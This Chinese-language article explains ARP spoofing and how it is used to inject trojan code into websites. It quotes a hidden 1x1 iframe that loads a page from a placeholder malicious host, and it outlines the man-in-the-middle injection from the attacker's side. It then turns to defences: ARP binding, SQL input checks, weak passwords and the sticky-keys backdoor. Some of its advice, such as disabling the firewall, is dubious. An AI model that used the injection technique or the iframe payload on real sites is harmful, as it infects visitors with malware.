網(wǎng)站被掛馬 ARP地址欺騙處理之道

什么是ARP

地址解析協(xié)議（Address Resolution Protocol， ARP）是在僅知道主機(jī)的IP地址時(shí)確定其物理地址的一種協(xié)議。 因IPv4和以太網(wǎng)的廣泛應(yīng)用， 其主要用作將IP地址翻譯為以太網(wǎng)的MAC地址， 但其也能在ATM和FDDIIP網(wǎng)絡(luò)中使用。 從IP地址到物理地址的映射有兩種方式：表格方式和非表格方式。 ARP具體說(shuō)來(lái)就是將網(wǎng)絡(luò)層（IP層， 也就是相當(dāng)于OSI的第三層）地址解析為數(shù)據(jù)連接層（MAC層， 也就是相當(dāng)于OSI的第二層）的MAC地址。

假設(shè)：

計(jì)算機(jī)A的IP為192.168.1.1， MAC地址為00-11-22-33-44-01;

計(jì)算機(jī)B的IP為192.168.1.2， MAC地址為00-11-22-33-44-02;

ARP工作原理如下：

在TCP/IP協(xié)議中， A給B發(fā)送IP包， 在包頭中需要填寫B(tài)的IP為目標(biāo)地址， 但這個(gè)IP包在以太網(wǎng)上傳輸?shù)臅r(shí)候， 還需要進(jìn)行一次以太包的封裝， 在這個(gè)以太包中， 目標(biāo)地址就是B的MAC地址。

計(jì)算機(jī)A是如何得知B的MAC地址的呢？解決問(wèn)題的關(guān)鍵就在于ARP協(xié)議。

在A不知道B的MAC地址的情況下， A就廣播一個(gè)ARP請(qǐng)求包， 請(qǐng)求包中填有B的IP(192.168.1.2)， 以太網(wǎng)中的所有計(jì)算機(jī)都會(huì)接收這個(gè)請(qǐng)求， 而正常的情況下只有B會(huì)給出ARP應(yīng)答包， 包中就填充上了B的MAC地址， 并回復(fù)給A。

A得到ARP應(yīng)答后， 將B的MAC地址放入本機(jī)緩存， 便于下次使用。

本機(jī)MAC緩存是有生存期的， 生存期結(jié)束后， 將再次重復(fù)上面的過(guò)程。

ARP協(xié)議并不只在發(fā)送了ARP請(qǐng)求才接收ARP應(yīng)答。 當(dāng)計(jì)算機(jī)接收到ARP應(yīng)答數(shù)據(jù)包的時(shí)候， 就會(huì)對(duì)本地的ARP緩存進(jìn)行更新， 將應(yīng)答中的IP和MAC地址存儲(chǔ)在ARP緩存中。 因此， 當(dāng)局域網(wǎng)中的某臺(tái)機(jī)器B向A發(fā)送一個(gè)自己偽造的ARP應(yīng)答， 而如果這個(gè)應(yīng)答是B冒充C偽造來(lái)的， 即IP地址為C的IP， 而MAC地址是偽造的， 則當(dāng)A接收到B偽造的ARP應(yīng)答后， 就會(huì)更新本地的ARP緩存， 這樣在A看來(lái)C的IP地址沒(méi)有變， 而它的MAC地址已經(jīng)不是原來(lái)那個(gè)了。 由于局域網(wǎng)的網(wǎng)絡(luò)流通不是根據(jù)IP地址進(jìn)行， 而是按照MAC地址進(jìn)行傳輸。 所以， 那個(gè)偽造出來(lái)的MAC地址在A上被改變成一個(gè)不存在的MAC地址， 這樣就會(huì)造成網(wǎng)絡(luò)不通， 導(dǎo)致A不能Ping通C！這就是一個(gè)簡(jiǎn)單的ARP欺騙。

應(yīng)用

在網(wǎng)絡(luò)執(zhí)法官中， 要想限制某臺(tái)機(jī)器上網(wǎng)， 只要點(diǎn)擊"網(wǎng)卡"菜單中的"權(quán)限"， 選擇指定的網(wǎng)卡號(hào)或在用戶列表中點(diǎn)擊該網(wǎng)卡所在行， 從右鍵菜單中選擇"權(quán)限"， 在彈出的對(duì)話框中即可限制該用戶的權(quán)限。 對(duì)于未登記網(wǎng)卡， 可以這樣限定其上線：只要設(shè)定好所有已知用戶（登記）后， 將網(wǎng)卡的默認(rèn)權(quán)限改為禁止上線即可阻止所有未知的網(wǎng)卡上線。 使用這兩個(gè)功能就可限制用戶上網(wǎng)。 其原理是通過(guò)ARP欺騙發(fā)給被攻擊的電腦一個(gè)假的網(wǎng)關(guān)IP地址對(duì)應(yīng)的MAC， 使其找不到網(wǎng)關(guān)真正的MAC地址， 這樣就可以禁止其上網(wǎng)。

防御

ARP欺騙可以導(dǎo)致目標(biāo)計(jì)算機(jī)與網(wǎng)關(guān)通信失敗

更可怕的是會(huì)導(dǎo)致通信重定向， 所有的數(shù)據(jù)都會(huì)通過(guò)攻擊者的機(jī)器， 因此存在極大的安全隱患。

基與PC到PC的IP-MAC雙向綁定可以解決ARP欺騙

但是對(duì)于不支持IP-MAC雙向綁定的設(shè)備

就需要用可以綁定端口-MAC的交換來(lái)預(yù)防ARP欺騙

另外， Windows 2KSP4 XPSP1 的Arp-S綁定是無(wú)效的

需要升級(jí)到 2KSP5 或 XPSP2

網(wǎng)頁(yè)掛馬原理

不管是訪問(wèn)服務(wù)器上的任何網(wǎng)頁(yè)， 就連404的頁(yè)面也會(huì)在<html>后加入：

<IFRAME SRC=http://www.aaaa.com/a.htm width =1 height=1 frameborder=0></IFRAME>;， 掛馬的位置在html標(biāo)記左右， 上面這段惡意代碼， 它會(huì)每隔幾秒加入代碼， 也就是說(shuō)在輸出具體的東西之前就被掛了， 有時(shí)有有時(shí)又沒(méi)有， 不是網(wǎng)頁(yè)源代碼問(wèn)題， 也沒(méi)有在網(wǎng)頁(yè)源代碼中加入惡意代碼， 即使重裝服務(wù)器， 格式化重分區(qū)過(guò)第一個(gè)硬盤， 放上去網(wǎng)站沒(méi)多久一樣再會(huì)出現(xiàn)這種情況。

首先就排除了網(wǎng)站被入侵的可能， 因?yàn)槭醉?yè)能加在那個(gè)位置只能是 title的地方， 用js控制也不大可能.然后去看了php.ini的設(shè)置也沒(méi)有任何的異常， 而且這個(gè)插入的代碼有的時(shí)候出現(xiàn)有的時(shí)候不出現(xiàn)， 說(shuō)明不是網(wǎng)站的問(wèn)題了。 打開(kāi)同服務(wù)器的其他網(wǎng)站也有這個(gè)情況發(fā)生， 而且狀況一一樣。 檢查并且搜索掛馬的關(guān)鍵字之后確定不是網(wǎng)站程序的問(wèn)題。

那么剩下的要么是IIS自己出了問(wèn)題， 要么是網(wǎng)絡(luò)的問(wèn)題， 因?yàn)閿?shù)據(jù)是處理沒(méi)有問(wèn)題(這個(gè)由程序輸出， 而且即使是html都會(huì)出問(wèn)題)， 經(jīng)過(guò)一個(gè)一個(gè)排查， 最后基本可以確定就是arp欺騙欺騙數(shù)據(jù)報(bào)走向， 然后中間人修改一些定義的關(guān)鍵字.因?yàn)槭蔷W(wǎng)絡(luò)層次有問(wèn)題(所以重做系統(tǒng)是沒(méi)有用的)。

目的：通過(guò)arp欺騙來(lái)直接掛馬

優(yōu)點(diǎn)：可以直接通過(guò)arp欺騙來(lái)掛馬。

通常的arp欺騙的攻擊方式是在同一vlan下， 控制一臺(tái)主機(jī)來(lái)監(jiān)聽(tīng)密碼， 或者結(jié)合ssh中間人攻擊來(lái)監(jiān)聽(tīng)ssh1的密碼

但這樣存在局限性：1、管理員經(jīng)常不登陸， 那么要很久才能監(jiān)聽(tīng)到密碼。

2、目標(biāo)主機(jī)只開(kāi)放了80端口， 和一個(gè)管理端口， 且80上只有靜態(tài)頁(yè)面， 那么很難利用.而管理端口， 如果是3389終端， 或者是ssh2， 那么非常難監(jiān)聽(tīng)到密碼。

優(yōu)點(diǎn)：1、可以不用獲得目標(biāo)主機(jī)的權(quán)限就可以直接在上面掛馬

2、非常隱蔽， 不改動(dòng)任何目標(biāo)主機(jī)的頁(yè)面或者是配置， 在網(wǎng)絡(luò)傳輸?shù)倪^(guò)程中間直接插入掛馬的語(yǔ)句。

3、可以最大化的利用arp欺騙， 從而只要獲取一臺(tái)同一vlan下主機(jī)的控制權(quán)， 就可以最大化戰(zhàn)果。

原理：arp中間人攻擊， 實(shí)際上相當(dāng)于做了一次代理。

正常時(shí)候: A---->B ， A是訪問(wèn)的正常客戶， B是要攻擊的服務(wù)器， C是被我們控制的主機(jī)

arp中間人攻擊時(shí)候: A---->C---->B         B---->C---->A

實(shí)際上， C在這里做了一次代理的作用

那么HTTP請(qǐng)求發(fā)過(guò)來(lái)的時(shí)候， C判斷下是哪個(gè)客戶端發(fā)過(guò)來(lái)的包， 轉(zhuǎn)發(fā)給B， 然后B返回HTTP響應(yīng)的時(shí)候， 在HTTP響應(yīng)包中， 插入一段掛馬的代碼， 比如 <iframe>...之類， 再將修改過(guò)的包返回的正常的客戶A， 就起到了一個(gè)掛馬的作用.在這個(gè)過(guò)程中， B是沒(méi)有任何感覺(jué)的， 直接攻擊的是正常的客戶A， 如果A是管理員或者是目標(biāo)單位， 就直接掛上馬了。

防御專題

最簡(jiǎn)單的辦法就一命令OK， 實(shí)現(xiàn)與網(wǎng)關(guān)綁定， 比如網(wǎng)關(guān)是 192.168.0.1 比如網(wǎng)關(guān)MAC 00-00-00-00-00， 好了我們直接用記事本保存代碼為 arp -s 192.168.0.1 00-00-00-00-00 然后保存， 改拓展名為bat 加入到服務(wù)器啟動(dòng)項(xiàng)， 目前ARP攻擊猖獗， ARP的目前為一的完美解決方案就是實(shí)現(xiàn) 本機(jī)與網(wǎng)關(guān)的雙向綁定。 所謂ARP防火墻， 只是起到暫時(shí)保護(hù)的作用， 以上方法可以有效的防止服務(wù)器被人ARP掛馬

SQL漏洞專題

簡(jiǎn)單一點(diǎn)：

對(duì)于int型的參數(shù)， 如文章的id等， 可以先判斷是不是整數(shù)。

這樣的話， 明小子系列就無(wú)法注入了。

也可以控制 "'"號(hào)輸入就行了， 再控制一些 SQL 關(guān)鍵字的這樣更安全

比如

提醒大家， SQL只要打完必補(bǔ)丁， 最重要的是， 千萬(wàn)別設(shè)置什么SA/123456 SA/123 SA/SA之類的弱口令， 現(xiàn)在的小黑太多了， 動(dòng)不動(dòng)就是全網(wǎng)段掃描1433弱口令， 在次提醒大家， 千萬(wàn)別設(shè)置弱口令。 基本服務(wù)器就安全（小黑是進(jìn)不來(lái)的， 高手嘛， 說(shuō)不準(zhǔn)了， 反正高手也不會(huì)動(dòng)你的東西）

服務(wù)器安全之后門篇

我們今天主要講解2003服務(wù)器

最常見(jiàn)的問(wèn)題， 服務(wù)器一般都開(kāi)3389 4899等， 在次提醒大家， 弱口令問(wèn)題， 現(xiàn)在什么小黑都有， 千萬(wàn)別設(shè)置什么123 123456之類， 修改3389 4899端口 建議停止微軟的防火墻， 直接在網(wǎng)上， 開(kāi)放需要的端口。 系統(tǒng)補(bǔ)丁， 我想不用說(shuō)， 肯定要打的。 也可采用國(guó)外的一款軟件 黑冰（號(hào)稱世界排第三， 本人以前用過(guò)， 感覺(jué)也就那樣， 不過(guò)確實(shí)不錯(cuò)）

本地安全策略設(shè)置密碼強(qiáng)度， 然后刪出系統(tǒng)默認(rèn)管理員， 修改管理組， 別留什么adminisrators 呵呵， 不允許建立帳戶， 嘿嘿， 絕吧。

服務(wù)器殺毒軟件必備！推薦使用麥咖啡。 上次進(jìn)了一批服務(wù)器， 發(fā)現(xiàn)全是用麥咖啡(連聯(lián)眾的計(jì)費(fèi)服務(wù)器， baidu的有一個(gè)服務(wù)器也是)， 設(shè)置OK基本百毒不侵（服務(wù)器好的建議使用， 呵呵就可以防止什么鴿子啊， 黑洞啊， 紅娘啊之類的東西裝上了）。

在次說(shuō)明請(qǐng)大家檢查自己的服務(wù)器登陸3389界面， 別輸入密碼， 先按5次SHIFT， 看看， 如果彈出c盤， 或cmd 或則一個(gè)密碼窗口， 呵呵恭喜你， 你的服務(wù)器被人玩了， 小弟可幫大家解決， 這個(gè)后門被譽(yù)為windows最強(qiáng)悍后門。 不需要密碼驗(yàn)證， 直接得到shell。